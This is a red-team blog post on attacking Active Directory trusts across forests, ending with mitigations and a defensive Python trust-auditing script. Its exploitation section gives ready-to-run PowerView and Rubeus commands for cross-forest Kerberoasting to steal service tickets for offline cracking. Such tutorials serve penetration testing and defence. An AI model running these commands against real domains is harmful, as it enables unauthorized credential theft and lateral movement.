
Exploiting Active Directory Trust Relationships Across Forests

Amr En-Niari
@4mrr · 8 min read

Introduction

Active Directory trust relationships are a powerful feature that enables resource sharing between domains and forests. However, when misconfigured, they become a significant attack vector for lateral movement and privilege escalation. In this post, we'll explore how to identify and exploit these relationships during red team engagements.

This post is based on real-world engagements and lab environments.

Understanding Trust Types

Before diving into exploitation, it's important to understand the different types of trusts that exist in Active Directory environments.

Parent-Child Trusts

These are automatically created when a new child domain is added to an existing domain tree. They are always two-way transitive trusts.

# Enumerate trusts using PowerView
Get-DomainTrust
Get-DomainTrust -Domain child.corp.local

# Using AD Module
Get-ADTrust -Filter *
Get-ADTrust -Identity "child.corp.local"

Enumerating Trust Relationships

The first step is always enumeration. We need to identify what trusts exist, their direction, and whether SID filtering is enabled.

# BloodHound collection
SharpHound.exe -c All,GPOLocalGroup --domain corp.local

# Map all trusts in the forest
Get-DomainTrustMapping

# Check SID filtering status
Get-DomainTrust | Select-Object SourceName,TargetName,TrustAttributes

Always verify your scope and authorization before performing trust enumeration in production environments.

Exploitation Techniques

Once we've mapped the trust relationships, several attack paths become available depending on the trust configuration.

Cross-Forest Kerberoasting

If a two-way trust exists between forests, we can request service tickets for SPNs in the target forest and attempt to crack them offline.

# Kerberoast across trust
Rubeus.exe kerberoast /domain:target.local /dc:dc01.target.local

# Using PowerView
Get-DomainUser -SPN -Domain target.local | Get-DomainSPNTicket

Detection & Mitigation

As security consultants, we should always provide remediation recommendations. Key mitigations for trust abuse include enabling SID filtering, implementing selective authentication, and monitoring for cross-domain ticket requests.
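As an added example (not code from the original post), here is a small Python decoder for the TrustAttributes bitmask that Get-DomainTrust / Get-ADTrust return; it turns the "check SID filtering status" step from the enumeration section and the SID-filtering / selective-authentication mitigations above into an automated review. It assumes trusts have been exported as (source, target, attributes) tuples; the sample trusts and domain names are constructed.

```python
# Decode the AD trustAttributes bitmask (MS-ADTS 6.1.6.7.9) and flag trusts whose
# SID filtering or selective authentication is not enforced (added example).
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0004: "QUARANTINED_DOMAIN",   # external trust with SID filtering (netdom /quarantine:yes)
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",   # selective authentication
    0x0020: "WITHIN_FOREST",        # parent-child / tree-root trust
    0x0040: "TREAT_AS_EXTERNAL",    # forest trust with SID history allowed (netdom /enablesidhistory:yes)
}

def decode_flags(attrs):
    return [name for bit, name in TRUST_ATTRIBUTES.items() if attrs & bit]

def assess_trust(attrs):
    # Classify the trust and work out whether SID filtering applies to it
    flags = set(decode_flags(attrs))
    if "WITHIN_FOREST" in flags:
        kind, filtered = "intra-forest", False   # not filtered by default; the forest is the boundary
    elif "FOREST_TRANSITIVE" in flags:
        kind, filtered = "forest", "TREAT_AS_EXTERNAL" not in flags   # on by default, relaxed by that bit
    else:
        kind, filtered = "external", "QUARANTINED_DOMAIN" in flags    # on only when quarantined
    return {"kind": kind, "sid_filtering": filtered,
            "selective_auth": "CROSS_ORGANIZATION" in flags, "flags": sorted(flags)}

def find_weak_trusts(trusts):
    # (source, target, reasons) for every trust that crosses the forest boundary unguarded
    findings = []
    for source, target, attrs in trusts:
        a = assess_trust(attrs)
        if a["kind"] == "intra-forest":
            continue   # no per-trust filtering control here; review the forest as one boundary
        checks = ((a["sid_filtering"], "SID filtering disabled"),
                  (a["selective_auth"], "no selective authentication"))
        reasons = [msg for ok, msg in checks if not ok]
        if reasons:
            findings.append((source, target, reasons))
    return findings

# Constructed sample records in the shape of a Get-ADTrust export (hypothetical domains)
SAMPLE_TRUSTS = [
    ("corp.local", "child.corp.local", 0x20),   # parent-child, within the forest
    ("corp.local", "partner.local", 0x08),      # forest trust, default SID filtering
    ("corp.local", "legacy.local", 0x48),       # forest trust with SID history enabled
    ("corp.local", "vendor.local", 0x14),       # external trust, quarantined + selective auth
    ("corp.local", "old-ext.local", 0x00),      # external trust with quarantine cleared
]

if __name__ == "__main__":
    for src, dst, reasons in find_weak_trusts(SAMPLE_TRUSTS):
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```

Feed it the TrustAttributes column from an actual export and every trust it reports is one where a SID-history or authentication restriction the mitigation list relies on is missing.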

The best defense against trust exploitation is the principle of least privilege — only create trusts that are absolutely necessary and restrict them as much as possible.